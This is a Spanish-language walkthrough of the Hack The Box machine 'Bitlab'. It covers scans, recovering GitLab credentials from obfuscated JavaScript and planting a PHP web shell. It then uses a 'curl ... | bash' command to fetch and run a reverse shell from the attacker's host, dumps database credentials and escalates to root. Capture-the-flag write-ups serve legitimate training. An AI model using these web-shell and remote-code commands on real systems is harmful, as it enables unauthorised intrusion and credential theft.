Bitlab

Bitlab


HTB Linux

nmap -A -p- -oA bitlab 10.129.189.67 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA bitlab 10.129.189.67

nmap -sU -O -p- -oA bitlab-udp 10.129.189.67

nikto -h 10.129.189.67:80

ssh_command.

ssh_command.

whatweb http://10.129.189.67

ssh_command.

Nos dirigimos a http://10.129.189.67

ssh_command.

Despues vamos a http://10.129.189.67/robots.txt

ssh_command.

En la ruta de /help le damos click a bookmarks.html

ssh_command.

Para GitLab Login vemos lo siguiente:

ssh_command.

Agarramos el javascript encontrado para el gitlab login y lo tratamos de decodificar.

echo “var …” | sed “s/&quot/‘/g”

ssh_command.

Nos dirigimos al login y ponemos las siguientes credenciales: clave:11des0081x

ssh_command.

En snippets vemos lo siguiente

ssh_command.

Creamos un archivo y le hacemos un merge

ssh_command.

Nos dirigimos a http://10.129.189.67/profile/rev_shell.php?cmd=id

ssh_command.

http://10.129.189.67/profile/rev_shell.php?cmd=curl 10.10.XX.XXX | bash

ssh_command.

Creamos un archivo index.html con un reverse shell

python3 -m http.server 80

nc -lvnp 443

ssh_command.

Actualizamos el shell

ssh_command.

php interacive

$connection = new PDO(‘pgsql:dbname=profiles;host=localhost’,p’profiles’,‘profiles’);

$connect = $connection->query(‘select * from profiles’);

$results = $connect->fetchAll();

print_r( $results);

ssh_command.

credenciales clave:c3NoLXN0cjBuZy1wQHNz==

ssh clave@10.129.189.67

ssh_command.

base64 -w 0 RemoteConnection.exe ; echo

ssh_command.

Como no podemos bajar el archivo por wget lo convertimos en base64

base64 -w 0 RemoteConnection.exe; echo

Despues para decodificarlo en base64

echo “AAANA…” | base64 -d > RemoteConnection.exe

ssh_command.

strings RemoteConnection.exe | grep “.dll”

ssh_command.

radare2 RemoteConnection.exe

aaa

afl

Pero aqui no encontre nada

ssh_command.

Corremos ghidra

./ghidraRun

ssh_command.

Vemos putty

ssh_command.

credenciales root:Qf7]8YSV.wDNF*[7d?j&eD4^

ssh_command.

cat /root/root.txt

ssh_command.

© 2025 Cu3rv0x